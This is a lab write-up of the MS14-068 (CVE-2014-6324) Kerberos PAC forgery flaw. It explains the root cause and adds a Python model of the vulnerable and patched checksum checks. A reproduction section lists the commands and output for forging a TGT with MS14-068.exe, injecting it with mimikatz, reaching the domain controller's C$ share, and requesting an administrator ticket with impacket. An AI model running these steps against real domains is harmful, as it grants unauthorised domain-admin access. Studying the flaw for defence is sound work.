I. Vulnerability background
Privilege escalation vulnerability, CVE-2014-6324.
II. Vulnerability principle
The root cause is that the KDC does not correctly validate the signature of the PAC carried in the ST.
The PAC carries two digital signatures: one made with the service account's hash, the other with the krbtgt account's hash. By design these use HMAC-family checksum algorithms, which require a key; that key is the krbtgt hash and the service hash respectively.
In practice, however, the signature was allowed to use any checksum algorithm, MD5 included, so no key is needed at all. This means the PAC contents can be forged arbitrarily; generating the server checksum with plain MD5 is then enough to pass the KDC's check.
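To make the principle concrete, here is an added Python model (not from the original post) of the KDC-side check of one PAC signature: the vulnerable policy honours whatever checksum type the signature block names, while the patched policy only admits the keyed HMAC types MS-PAC permits. The RFC 4757 HMAC-MD5 checksum is implemented for the RC4-HMAC case; the AES types are only policy-checked, and the key and PAC bytes used in the test are constructed sample values.

```python
import hashlib
import hmac

# Kerberos checksum type numbers (RFC 3961, RFC 4757, MS-PAC section 2.8).
KERB_CHECKSUM_RSA_MD5 = 7               # unkeyed: computable by anyone
KERB_CHECKSUM_HMAC_MD5 = -138           # keyed, 0xFFFFFF76 in MS-PAC
KERB_CHECKSUM_HMAC_SHA1_96_AES128 = 15  # keyed
KERB_CHECKSUM_HMAC_SHA1_96_AES256 = 16  # keyed

# The only signature types MS-PAC permits for the server and KDC signatures.
KEYED_PAC_CHECKSUMS = {
    KERB_CHECKSUM_HMAC_MD5,
    KERB_CHECKSUM_HMAC_SHA1_96_AES128,
    KERB_CHECKSUM_HMAC_SHA1_96_AES256,
}
KERB_NON_KERB_CKSUM_SALT = 17  # key usage number used for PAC signatures


def hmac_md5_checksum(key: bytes, data: bytes) -> bytes:
    """RFC 4757 HMAC-MD5 checksum over a PAC, keyed with an RC4 (NT hash) key."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    tmp = hashlib.md5(KERB_NON_KERB_CKSUM_SALT.to_bytes(4, "little") + data).digest()
    return hmac.new(ksign, tmp, hashlib.md5).digest()


def verify_pac_signature(sig_type: int, signature: bytes, pac_bytes: bytes,
                         key: bytes, patched: bool) -> bool:
    """Model of the KDC checking one PAC_SIGNATURE_DATA element.

    patched=False reproduces the behaviour described above: whatever checksum
    type the signature block names is honoured, even an unkeyed one.
    patched=True is the MS14-068 fix: the type must be a keyed HMAC, so a
    signature computed without the krbtgt (or service) hash is never compared.
    """
    if patched and sig_type not in KEYED_PAC_CHECKSUMS:
        return False
    if sig_type == KERB_CHECKSUM_HMAC_MD5:
        expected = hmac_md5_checksum(key, pac_bytes)
    elif sig_type == KERB_CHECKSUM_RSA_MD5:
        expected = hashlib.md5(pac_bytes).digest()  # no key involved at all
    else:
        return False  # AES HMAC-SHA1-96 variants are not modelled here
    # Constant-time comparison; a plain == would leak timing information.
    return hmac.compare_digest(expected, signature)
```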
III. Vulnerability reproduction
Domain controller: Win2008, 10.10.4.24
Host: Win2008, 10.10.4.25
Domain user: sec1.local\hack
1. MS14-068 privilege escalation
# Check the current user's SID
C:\>whoami /user
USER INFORMATION
----------------
User Name SID
========= =============================================
sec1\hack S-1-5-21-275840881-3236154311-2410272474-1103
# Exploit the vulnerability
C:\Users\hack\Desktop>MS14-068.exe -u hack@sec1.local -p Az123456@ -s S-1-5-21-275840881-3236154311-2410272474-1103 -d 10.10.4.24
Access is denied.
C:\Users\hack\Desktop>MS14-068.exe -u hack@sec1.local -p Az123456@ -s S-1-5-21-275840881-3236154311-2410272474-1103 -d 10.10.4.24
[+] Building AS-REQ for 10.10.4.24... Done!
[+] Sending AS-REQ to 10.10.4.24... Done!
[+] Receiving AS-REP from 10.10.4.24... Done!
[+] Parsing AS-REP from 10.10.4.24... Done!
[+] Building TGS-REQ for 10.10.4.24... Done!
[+] Sending TGS-REQ to 10.10.4.24... Done!
[+] Receiving TGS-REP from 10.10.4.24... Done!
[+] Parsing TGS-REP from 10.10.4.24... Done!
[+] Creating ccache file 'TGT_hack@sec1.local.ccache'... Done!
C:\Users\hack\Desktop>
# Import the ticket with mimikatz
mimikatz # kerberos::ptc C:\Users\hack\Desktop\x64\TGT_hack@sec1.local.ccache
Principal : (01) : hack ; @ SEC1.LOCAL
Data 0
Start/End/MaxRenew: 6/2/2025 5:26:52 AM ; 6/2/2025 3:26:52 PM ; 6/9/2025 5:26:52 AM
Service Name (01) : krbtgt ; SEC1.LOCAL ; @ SEC1.LOCAL
Target Name (01) : krbtgt ; SEC1.LOCAL ; @ SEC1.LOCAL
Client Name (01) : hack ; @ SEC1.LOCAL
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 - rc4_hmac_nt 6b2083759a56c77d0866071e8d1d5a27
Ticket : 0x00000000 - null ; kvno = 2
[...]
* Injecting ticket : OK
mimikatz #
C:\Users\hack\Desktop>dir \\WIN-PJM2A2QKVCR.sec1.local\C$
Volume in drive \\WIN-PJM2A2QKVCR.sec1.local\C$ has no label.
Volume Serial Number is F4C0-CFB1
Directory of \\WIN-PJM2A2QKVCR.sec1.local\C$
06/02/2025 05:22 AM 1,206,166 mimikatz_trunk.zip
07/13/2009 08:20 PM <DIR> PerfLogs
04/07/2025 12:21 AM <DIR> Program Files
07/13/2009 10:06 PM <DIR> Program Files (x86)
06/02/2025 03:58 AM <DIR> Users
06/02/2025 05:22 AM <DIR> Windows
1 File(s) 1,206,166 bytes
5 Dir(s) 202,960,355,328 bytes free
Verify from Kali
# Import the ticket
(base) ┌──(root㉿Kali)-[~]
└─# KRB5CCNAME=TGT_hack@sec1.local.ccache
# Obtain the ST
(base) ┌──(root㉿Kali)-[~]
└─# getST.py -dc-ip 10.10.4.24 sec1.local/administrator -spn CIFS/WIN-PJM2A2QKVCR.sec1.local -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in administrator@CIFS_WIN-PJM2A2QKVCR.sec1.local@SEC1.LOCAL.ccache
(base) ┌──(root㉿Kali)-[~]
└─# KRB5CCNAME=administrator@CIFS_WIN-PJM2A2QKVCR.sec1.local@SEC1.LOCAL.ccache